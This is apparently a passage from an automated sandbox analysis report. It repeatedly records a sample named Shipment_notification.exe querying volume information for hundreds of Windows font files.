Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Shipment_notification.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
